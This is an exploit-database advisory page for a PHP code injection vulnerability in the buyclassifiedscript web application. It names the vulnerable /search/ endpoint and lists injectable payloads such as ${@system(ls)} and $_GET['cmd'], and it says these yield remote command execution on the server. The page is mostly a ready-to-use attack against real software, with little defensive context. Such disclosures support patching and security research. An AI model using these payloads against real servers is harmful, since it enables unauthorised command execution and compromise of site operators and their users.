BuyClassifiedScript - PHP Code Injection



EKU-ID: 28395 CVE: OSVDB-87875 OSVDB-ID:
Author: d3b4g Published: 2012-11-26 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


# Exploit Title: buyclassifiedscript PHP code injection vulnerability
# Date: 25.11.201
# Exploit Author: d3b4g
# Vendor Homepage: http://buyclassifiedscript.com/
# Tested on:Windows 7
# Blog: d3b4g.me




----------------------------------------------------------------------------------

     This vulnerability  allows an attacker to inject custom code
     into the server side scripting engine.It's possible to get a remote cmd by taking
     advantage of this vulnerability.


     Vulnerable function:

     /search/


     () php code excution :


     http://localhost/path/search {Inject malicious code}


     () example of code you can inject:


     //  ${@system(ls)}

        ${@print(hello)}

        $_GET['cmd']


                         //



-end-